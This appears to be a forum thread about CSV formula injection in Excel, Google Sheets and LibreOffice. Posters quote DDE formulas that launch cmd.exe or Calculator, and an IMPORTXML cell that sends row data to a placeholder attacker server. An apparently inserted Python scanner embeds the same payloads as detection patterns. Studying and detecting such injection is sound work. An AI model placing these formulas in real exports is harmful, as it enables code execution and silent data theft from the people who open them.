More Excelence in spreadsheet-land


  • Impossible Mission - B


  • And then the murders began.

    As if I needed more reasons to hate Excel.



  • Excel runs scripts after users click "Allow". News at 11!

    More seriously, we make use of this stupidity in Excel when users want to export from our system so that they can see the underlying formulas and edit them after the export. I'm sure lots of other tricks could be done to access data from the target computer using formulas (like injecting VB script?).

    The whole idea that Excel tries to guess what to do with the data (and is annoyingly wrong sometimes) is typical Microsoft crap.



  • @unperverted-vixen said in More Excelence in spreadsheet-land:

    As if I needed more reasons to hate Excel.

    I'd like to point out that the second part demonstrates the same thing for Google Sheets. And I'd be surprised if LibreOffice didn't have similar shenanigans going on.


  • And then the murders began.

    @rhywden Okay, Excel's not the only offender. It's just the one I actually use. :p


  • Notification Spam Recipient

    @unperverted-vixen said in More Excelence in spreadsheet-land:

    @rhywden Okay, Excel's not the only offender. It's just the one I actually use. :p

    And you pay (plenty) for it, so it's sane for you to actively expect it to not be shit.



  • Don't worry, Excel solves that by being incompatible with most CSV files.



  • Even without the security risk this is a bug that mangles data.

    I have to work with a lot of grubby records exported as text or as spreadsheets. By the time I get to see them they're often full of '#name?' values as text. Somewhere along the line a user innocently wrote an entry that began with an '='. If that flat-file ever gets anywhere near Excel then it will try, and fail, to interpret the text as a formula. Once the data is re-exported to text all that's left is the useless error message ghost. I see hundreds of entries like this.

    I know the work-flow is broken, but in many cases the data files have been sitting around for years - the originals are long gone. I can't disabuse my users of the notion that Excel is a good way to view and edit csv files.

    Don't get me started on the way Excel mangles dates (and anything that looks even slightly like a date)

    🍊



  • @japonicus said in More Excelence in spreadsheet-land:

    I can't disabuse my users of the notion that Excel is a good way to view and edit csv files.

    Maybe use the trick described in OP to show a warning that it's not to be opened with Excel? Preferably clearing all other content of the file.



  • Wow. Okay, while I had no idea that something like =cmd|' /C calc'!A1 would actually try to launch cmd.exe with those arguments, it does at least say that:

    [screenshot of the prompt]

    I sure as hell am not going to click "Yes" when a workbook unexpectedly prompts me to allow it to "Start application 'CMD.EXE'?". And yeah, it does successfully launch Calculator if I do click "Yes".


  • Impossible Mission Players - A

    @anotherusername said in More Excelence in spreadsheet-land:

    Wow. Okay, while I had no idea that something like =cmd|' /C calc'!A1 would actually try to launch cmd.exe with those arguments, it does at least say that:

    [screenshot of the prompt]

    I sure as hell am not going to click "Yes" when a workbook unexpectedly prompts me to allow it to "Start application 'CMD.EXE'?". And yeah, it does successfully launch Calculator if I do click "Yes".

    I'm just floored that that's actually a thing you can do in Excel. Like, what??? You literally baked arbitrary code execution into a data format! Who approved this?!?!

    It was because OLE was too hard, wasn't it?

    Linux devs would be proud....



  • @tsaukpaetra said in More Excelence in spreadsheet-land:

    I'm just floored that that's actually a thing you can do in Excel. Like, what??? You literally baked arbitrary code execution into a data format! Who approved this?!?!

    Someone decades ago when security was very low on the list of concerns.



  • @tsaukpaetra 🤦 it doesn't even need to be cmd. Any application name can be given, and the arguments don't even need to be anything in particular (they're required to be something, though):

    =calc|a!a

    Know what's even more awesome? Just pasting that into Excel is enough to cause it to try to run. Although, it apparently has to be plain text on the clipboard, so copying it from here won't work. Copy from here and paste it into Notepad (or any plain-text field... pasting it into the web console will also work); then copy it from that and paste it into Excel.


  • Impossible Mission - B

    @anotherusername said in More Excelence in spreadsheet-land:

    Know what's even more awesome? Just pasting that into Excel is enough to cause it to try to run. Although, it apparently has to be plain text on the clipboard, so copying it from here won't work. Copy from here and paste it into Notepad (or any plain-text field... pasting it into the web console will also work); then copy it from that and paste it into Excel.



  • undefined ^ ∞



  • @pie_flavor said in More Excelence in spreadsheet-land:

    @unperverted-vixen said in More Excelence in spreadsheet-land:

    @rhywden Okay, Excel's not the only offender. It's just the one I actually use. :p

    And you pay (plenty) for it, so it's sane for you to actively expect it to not be shit.

    Only aliens who arrived on this planet this week would have that expectation. And maybe my nana who still thinks computers are a fad.


  • And then the murders began.

    @anotherusername said in More Excelence in spreadsheet-land:

    Copy from here and paste it into Notepad (or any plain-text field... pasting it into the web console will also work); then copy it from that and paste it into Excel.

    Why bother breaking out the console? There's a perfectly good address bar right in my browser!


  • Discourse touched me in a no-no place

    @anonymous234 said in More Excelence in spreadsheet-land:

    Someone decades ago when security was very low on the list of concerns.

    The terrifying thing is that this sort of idiotic misinterpretation thing is probably being relied upon by a great many businesses' everyday business spreadsheets, so MS don't dare fix it properly.


  • Notification Spam Recipient

    @dkf said in More Excelence in spreadsheet-land:

    @anonymous234 said in More Excelence in spreadsheet-land:

    Someone decades ago when security was very low on the list of concerns.

    The terrifying thing is that this sort of idiotic misinterpretation thing is probably being relied upon by a great many businesses' everyday business spreadsheets, so MS don't dare fix it properly.

    Copy of Copy of Copy of test_spreadsheet (2) (3) (Copy) (Copy) [DO NOT EDIT OR THE DATABASE DELETES ITSELF].xlsx.xls.xlsx



  • @rhywden said in More Excelence in spreadsheet-land:

    I'd like to point out that the second part demonstrates the same thing for Google Sheets. And I'd be surprised if LibreOffice didn't have similar shenanigans going on.

    It doesn’t:

    Foo,Bar
    1,"=1+2"
    

    when imported gives:

    [screenshot: LibreOffice import dialog]

    But then it does anyway:

    [screenshot: LibreOffice showing the cell evaluated]

    You can avoid it by checking the “Quoted field as text” box, but that requires conscious effort.

    Though I’m happy to report that Numbers (the spreadsheet I normally use) doesn’t suffer from this:

    [screenshot: Numbers showing the cell as text]

    Editing the cell with the calculation does cause it to be executed, though, because at that point it sees the = and decides to interpret it as a formula.



  • @gurth When you import it THAT way then Excel will not do this either.

    The article is about autoimport, i.e. doubleclick on a .csv and letting the default program do its work.



  • @dkf said in More Excelence in spreadsheet-land:

    The terrifying thing is that this sort of idiotic misinterpretation thing is probably being relied upon by a great many businesses' everyday business spreadsheets, so MS don't dare fix it properly.

    Doesn't that go for pretty much the entirety of the Microsoft product catalog, which is a key reason for their software being horribly bloated and broken?



  • @unperverted-vixen said in More Excelence in spreadsheet-land:

    @anotherusername said in More Excelence in spreadsheet-land:

    Copy from here and paste it into Notepad (or any plain-text field... pasting it into the web console will also work); then copy it from that and paste it into Excel.

    Why bother breaking out the console? There's a perfectly good address bar right in my browser!

    For all I know, copying from the address bar includes a "web uri" data type and that causes it not to work.

    Although, I get the impression that maybe you tried it and it did work, and I'm on mobile so I can't test it either way.


  • And then the murders began.

    @anotherusername Not this specifically, but I will routinely paste into my address bar to strip formatting before pasting into emails or JIRA...



  • @unperverted-vixen it does work.



  • @rhywden said in More Excelence in spreadsheet-land:

    @gurth When you import it THAT way then Excel will not do this as well.

    The article is about autoimport, i.e. doubleclick on a .csv and letting the default program do its work.

    I dragged-and-dropped the CSV file onto the LibreOffice and Numbers icons and let them import it. If this causes different behaviour than double-clicking the file does, then there’s far more undefinedery going on. But let me test it for you …

    As I thought: if I set LibreOffice as the default program to open my CSV test file with, then double-click that file, LibreOffice pops up the same dialog as I included a screenshot of above.

    Trying it with Excel 2008 (the newest I have), I don’t get an import dialog but it does execute the formula. Opening the CSV file by the File → Open menu, it does the exact same thing.



  • @gurth I just tried it in Excel 2016.

    Ribbon menu => Data => From csv or text

    yields:

    [screenshot: Excel 2016 import preview]



  • @rhywden If I try that method in Excel 2008 (well, import from text file, as there’s no import from CSV, but choosing text file also allows a CSV file to be selected), it does show an import dialog. The only way I can get it to import the =1+2 cell as showing that instead of as 3 is if I go to step 3 of the text import wizard and indicate there that the column it’s in, should be imported as text instead of as the default cell type.

    IOW: it seems they improved that part of Excel at least since 2008.


  • area_can

    @quijibo said in More Excelence in spreadsheet-land:

    Excel runs scripts after users click "Allow". News at 11!

    Excel also performs HTTP requests without any confirmation:

    2,2017-07-25,Important Client,"=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")",240

    The attacker starts the cell with their trusty = symbol prefix and then points IMPORTXML to a server they control, appending spreadsheet data as a query string. Now they can open up their server log and bam! Data that isn’t theirs. Try it yourself with a Requestb.in.

    The ultra sinister thing here? No warnings, no popups, no reason to think that anything is amiss. The attacker just enters a similarly formatted time/issue/whatever entry, eventually an administrator attempts to view a CSV export and all that limited-access data is immediately, and quietly sent away.

    and with google sheets, you can pull in other sheets data:

    And this is Google Sheets - Sheets are not limited to just their own data, in fact they can pull in data from other spreadsheets that the user has access to. All that an attacker has to know is the other sheet’s id. That information isn’t usually considered secret; it appears in the spreadsheet urls, and will often be accidentally emailed, or posted in intra-company documentation, relying on Google’s security to ensure only authorized users access that data.
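The three behaviours this thread has collected (a harmless entry that begins with = being evaluated and later re-exported as #NAME?, the DDE form =cmd|' /C calc'!A1 / =calc|a!a, and the IMPORTXML cell quoted just above) can all be caught at export time, before the CSV ever reaches a double-click in Excel. The Python below is an added example, not code from the thread, the quoted article, or any spreadsheet vendor. It scans CSV text for cells a spreadsheet would treat as formulas, labels the DDE and remote-fetch patterns separately, and neutralizes flagged cells by prefixing a single quote (the usual "store as text" marker), while leaving plain numbers such as -1 alone. The trigger list, the DDE regular expression and the list of network-capable functions are my assumptions about what spreadsheets interpret, not a specification; the sample export is constructed here and reuses the payloads quoted in the thread.

```python
import csv
import io
import re

# Leading characters that Excel, Google Sheets and LibreOffice may take as the
# start of a formula when a CSV is opened directly.  '+' and '-' are included
# because "+1+2" style cells are evaluated too; '\t' and '\r' because some
# importers trim them and then look at the next character.  (Assumed list.)
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Plain numbers such as "-1" or "+3.5" are harmless and must not be rewritten.
NUMBER_RE = re.compile(r"^[+-]?\d+(\.\d+)?$")

# DDE launch form seen in the thread: =cmd|' /C calc'!A1 and =calc|a!a
# i.e. trigger, program name, '|', arguments, '!', cell reference.  (Assumed.)
DDE_RE = re.compile(r"^[=+\-@]\s*\w+\s*\|.*!\S+")

# Formula functions that fetch from the network (Google Sheets / Excel);
# the IMPORTXML cell quoted above is the canonical exfiltration example.
REMOTE_FUNCS = ("IMPORTXML", "IMPORTDATA", "IMPORTHTML", "IMPORTFEED",
                "IMPORTRANGE", "WEBSERVICE", "HYPERLINK")


def classify_cell(value):
    """Return 'dde', 'remote', 'formula' or None for one CSV cell."""
    if not value or not value.startswith(FORMULA_TRIGGERS):
        return None
    if NUMBER_RE.match(value.strip()):
        return None
    if DDE_RE.match(value):
        return "dde"
    upper = value.upper()
    if any(func + "(" in upper for func in REMOTE_FUNCS):
        return "remote"
    return "formula"


def neutralize_cell(value):
    """Prefix a risky cell with a single quote so it is stored as text.

    Unlike double-quoting the field (which the LibreOffice screenshots in
    the thread show is ignored on import), the leading quote survives a
    direct double-click open; Excel and Sheets hide it in the cell display.
    """
    if classify_cell(value) is not None:
        return "'" + value
    return value


def parse_csv(text):
    """Parse CSV text into a list of rows (lists of strings)."""
    return list(csv.reader(io.StringIO(text)))


def scan_csv(text):
    """List (row, col, label, value) for every cell a spreadsheet would run."""
    findings = []
    for r, row in enumerate(parse_csv(text)):
        for c, cell in enumerate(row):
            label = classify_cell(cell)
            if label is not None:
                findings.append((r, c, label, cell))
    return findings


def sanitize_csv(text):
    """Rewrite CSV text with every risky cell neutralized; fields re-quoted."""
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in parse_csv(text):
        writer.writerow([neutralize_cell(cell) for cell in row])
    return out.getvalue()


# Constructed sample export: rows 2-4 carry the payloads quoted in the thread,
# row 5 is the innocent "entry that began with an =" case that ends up as #NAME?.
SAMPLE = (
    "id,date,client,note,hours\n"
    "1,2017-07-25,Acme,Regular entry,8\n"
    "2,2017-07-25,Important Client,"
    "\"=IMPORTXML(CONCAT(\"\"http://some-server-with-log.evil?v=\"\", "
    "CONCATENATE(A2:E2)), \"\"//a\"\")\",240\n"
    "3,2017-07-26,Evil Corp,\"=cmd|' /C calc'!A1\",1\n"
    "4,2017-07-26,Evil Corp,=calc|a!a,1\n"
    "5,2017-07-27,Intern,=approx 3 hrs (see ticket),0\n"
)

if __name__ == "__main__":
    for r, c, label, cell in scan_csv(SAMPLE):
        print(f"row {r} col {c}: {label:8s} {cell!r}")
    print(sanitize_csv(SAMPLE))
```

Run it as a script to see the four flagged cells and the rewritten export. The trigger list errs on the side of flagging: free text such as "-1 (unknown)" is treated as a formula and gets the quote, which is harmless for text columns but worth knowing if a downstream system expects the raw value. Prefixing is preferable to stripping the character, since the innocent "=approx 3 hrs" entry keeps its content instead of being mangled into an error string.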



  • @atazhaia said in More Excelence in spreadsheet-land:

    @dkf said in More Excelence in spreadsheet-land:

    The terrifying thing is that this sort of idiotic misinterpretation thing is probably being relied upon by a great many businesses' everyday business spreadsheets, so MS don't dare fix it properly.

    Doesn't that go for pretty much the entirety of the Microsoft product catalog, which is a key reason for their software being horribly bloated and broken?

    It goes for pretty much everything in computers. Makefiles, anyone?



  • @scholrlea said in More Excelence in spreadsheet-land:

    Makefiles, anyone?

    Please, not makefiles! Have mercy upon me!



  • @bb36e said in More Excelence in spreadsheet-land:

    @quijibo said in More Excelence in spreadsheet-land:

    Excel runs scripts after users click "Allow". News at 11!

    Excel also performs HTTP requests without any confirmation:

    ...

    No, it does not. Excel 2010 does not support IMPORTXML and the article only talks about Google Sheets. If Excel does support some method for doing HTTP requests, my guess is that it would either prompt to run scripts when you open the file, or prompt about a cross-site request (local file loading from the web) before it makes the request.

    From the article:

    Well recall that while we cannot run macros in Google Sheets, we can absolutely run formulas. And formulas don’t have to be limited to simple arithmetic. In fact, are there any Google Sheets commands available in formulas that can send data elsewhere? Why yes, there seem to be quite a few. But lets take a look at IMPORTXML in particular.

    I already feel dirty for defending Microsoft, but let's not spread misinformation.




  • @quijibo

    @quijibo said in More Excelence in spreadsheet-land:

    Excel 2010 does not support IMPORTXML

    ⭕

    @quijibo said in More Excelence in spreadsheet-land:

    it would either prompt to run scripts when you open the file, or prompt about a cross-site request (local file loading from the web) before it makes the request.

    ❌


  • Discourse touched me in a no-no place

    @scholrlea said in More Excelence in spreadsheet-land:

    Makefiles, anyone?

    Do those makefiles include macros in them that dynamically create makefile rules? I hate those; they're so hard to debug…



  • I feel like the article is silly, in the sense that this is not so much a vulnerability as it is a misunderstanding of what your tools do. CSV is a perfectly inert format, and any program that displays csv files should not present a danger when inspecting any csv file. But Excel does not display csv files, it imports them. Importing, in every program, means converting something from a format it can't use into a format it can. Since Excel executes things, it is to be expected that imported things can be executed. After all, if you had a sheet that executed things and you exported it to csv, you would expect Excel to re-execute those same things when you import that exported sheet.

    Thinking "I don't know that there's anything dangerous in this unknown file, thus it can't possibly have anything dangerous" is a vulnerability in people, not software. The software can't protect you if you think that way, because you're going to just ignore every warning that pops up anyway.



  • @dkf said in More Excelence in spreadsheet-land:

    @scholrlea said in More Excelence in spreadsheet-land:

    Makefiles, anyone?

    Do those makefiles include macros in them that dynamically create makefile rules? I hate those; they're so hard to debug…

    Well, yeah, that's a pile of undefined in its own right to be sure, but I was referring to the 'required leading tabs' horseshit. Supposedly, the original developer of make noticed the problem early on, but decided that he didn't want to risk fixing it because he had a whole ten users already and he didn't want to break their existing scripts.

    It is worth bearing in mind that he never expected to have many more users, because Unix was some obscure thing that was thrown together on a lark and would never get used outside of Bell Labs. He just didn't see it as mattering, because it would be replaced in a few months' time anyway - his cobbled-together copy of a relatively minor Tenex utility just wasn't important enough to piss off those ten guys down the hall.

